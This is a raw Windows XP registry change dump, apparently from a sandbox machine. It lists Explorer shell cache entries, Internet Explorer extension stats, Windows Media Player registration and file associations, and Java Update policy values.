HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU	1		hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1	NodeSlot		dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1	MRUListEx		hex:ff,ff,ff,ff,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell	FolderType		"MyDocuments"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@explorer.exe,-7004		"Opens your Internet browser."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@shell32.dll,-12704		"Internet P&roperties"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@C:\WINDOWS\system32\ieframe.dll.mui,-39229		"Browse Without &Add-ons"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@shell32.dll,-12705		"&Browse the Internet"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Internet Explorer\iexplore.exe		"Internet Explorer"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Type		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Flags		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Count		dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Type		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Flags		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Count		dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore	Time		hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore	Count	dword:00000004	dword:00000005
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03,	hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore	Count	dword:00000002	dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02,	hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore	Count	dword:00000002	dword:00000007
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01,	hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore	LoadTime	dword:00000088	dword:0000009d
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore	Count	dword:00000003	dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@shell32.dll,-12704		"Internet P&roperties"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@C:\WINDOWS\system32\ieframe.dll.mui,-39229		"Browse Without &Add-ons"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@shell32.dll,-12705		"&Browse the Internet"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Internet Explorer\iexplore.exe		"Internet Explorer"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@xpsp1res.dll,-11005		"Sends and receives e-mail and newsgroup messages."
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Wireshark\wireshark.exe		"Wireshark"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Common Files\Java\Java Update\jucheck.exe		"Java(TM) Update Checker"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Windows Media Player\setup_wm.exe		"Microsoft Windows Media Configuration Utility"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\system32\taskmgr.exe		"Windows TaskManager"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\explorer.exe		"Windows Explorer"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@xpsp3res.dll,-20000		"Network Diagnostics for Windows XP"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@shell32.dll,-12691		"My Recent Documents"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	@C:\WINDOWS\system32\SHELL32.dll,-9217		"My Network Places"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\inf\unregmp2.exe		"Microsoft Windows Media Player Setup Utility"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Windows Media Player\wmplayer.exe		"Windows Media Player"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General	UniqueID		"{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General	ComputerName		"SANDBOX"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General	VolumeSerialNumber		dword:20d334b5
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace	LocalBase	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace	DTDFile	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace	LocalDelta	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\Namespace	RemoteDelta	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications	"C:\PROGRA~1\WINDOW~2\wmplayer.exe"	"Yes"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications	C:\PROGRA~1\WINDOW~2\wmplayer.exe	"Yes"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications	"C:\Program Files\Windows Media Player\wmplayer.exe"	"Yes"
HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications	C:\Program Files\Windows Media Player\wmplayer.exe	"Yes"
HKEY_CURRENT_USER\SessionInformation	ProgramCount	dword:00000001	dword:00000005
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand	@		"Windows Media Player"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand\CLSID	@		"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1	@		"Windows Media Player"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1\CLSID	@		"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}	@		"Windows Media Player"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32	@		"C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32	ThreadingModel		"Apartment"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID	@		"WMP.DeskBand.1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID	@		"WMP.DeskBand"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}	@		"IWMPDeskBand"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid	@		"{00020424-0000-0000-C000-000000000046}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32	@		"{00020424-0000-0000-C000-000000000046}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib	@		"{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib	Version		"1.0"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer	CLSID		"{cd3afa96-b84f-48f0-9393-7edc34128127}"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0	@		"WMPDeskBand 1.0 Type Library"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32	@		"C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS	@		"0"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR	@		"C:\PROGRA~1\WINDOW~2\"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	PostStatusUrl	"https://sjremetrics.java.com/b/ss//6"	"https://nometrics.java.com"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdateSchedule	dword:00000011	dword:00000003
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	Frequency	dword:01184000	dword:01020800
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdateMin	dword:00000024	dword:00000019
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	ScheduleId	"S-1-5"	"S-1-5-21-484763869-706699826-1060284298"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	Method		"jau"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	LastUpdateBeginTime		"Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	LastUDCheckTime		"Sat, 22 Sep 2012 16:30:11 GMT"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	VersionXmlChecksum		"5d18fd23851119c46b57669867f4c625390fbed3"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	LocalFileName		"http://javadl.sun.com/webapps/download/GetFile/1.6.0_35-b10/windows-i586/jre-6u35-windows-i586-iftw.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	InstallOptions		"/installmethod=jau SP1OFF=1 SP2OFF=1 SP3OFF=1 SP4OFF=1 SP5OFF=1 SP6OFF=1 SP7OFF=1 SP8OFF=1 SP9OFF=1 SP10OFF=1 SP13OFF=1 SP15OFF=1 MSDIR=ms5 SPWEB=http://javadl-esd.sun.com/update/1.6.0/sp-1.6.0_35-b10 "
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdateDescription		"Java 6 Update 35 is ready to install. Click the Install button to update Java now. If you wish to update Java later, click the Later button."
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdateMoreInfoUrl		"http://java.com/infourl"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	BalloonTitle		"Java Update Available"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	BalloonTip		"A new version of Java is ready to be installed."
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdateTitle1		"Java Update Available"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	DlgCaption		"Java Update - Update Available"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	MoreInfoTxt		"More information..."
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	InstalledJREVersion		"1.6.0_29"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	NewJREVersion		"1.6.0_35-b10"
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	PreDownldStatus		dword:00000012
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdAvailNotifyCnt		dword:00000001
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy	UpdAvailNotifyTime		dword:0005b708
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG	Seed	hex:4b,98,83,aa,b8,84,79,15,5c,f2,41,1f,58,85,65,dd,da,5c,10,c2,4e,97,fc,bf,e8,02,7d,2b,ed,20,24,e6,85,25,90,84,33,a2,48,95,15,19,e3,f4,07,47,a0,41,ec,7e,cf,61,a2,75,19,7b,6b,a2,ae,e4,a9,bf,61,25,52,78,04,ec,79,60,0b,aa,16,2c,27,b2,57,0c,07,d3,	hex:16,65,03,44,e9,42,2e,8c,1e,62,1e,55,0f,02,89,7c,f7,5e,b9,12,35,f2,e2,4e,11,4f,f9,2d,0e,e0,2f,84,b3,3f,c7,17,21,5e,93,05,75,47,43,84,ad,c6,5b,e5,d7,2e,5b,88,01,a3,6d,02,2b,79,e5,71,63,a7,e2,41,0d,ad,04,59,53,1c,07,1f,27,3a,bc,b0,2d,6d,0f,6a,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication	Name	"mshta.exe"	"wmplayer.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication	ID	dword:49b3ac74	dword:48025cf1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Preferences	MyPlayLists	"C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"	"C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Devices\AudioCD	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aif	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aifc	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aiff	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asf	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asx	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.au	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.avi	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.cda	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.dvr-ms	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m1v	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m3u	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mid	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.midi	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2v	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp3	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpa	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpe	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpeg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpv2	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.rmi	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.snd	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wav	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wax	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wm	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wma	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmd	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmv	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmx	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmz	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wpl	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wvx	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/vnd.ms-wpl	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-mplayer2	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmd	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmz	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/aiff	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/basic	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mid	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/midi	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mp3	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpeg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpegurl	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/wav	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-aiff	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mid	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-midi	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mp3	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpeg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpegurl	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wax	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wma	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-wav	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\midi/mid	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/avi	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpeg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/msvideo	UserApprovedOwning		"yes"
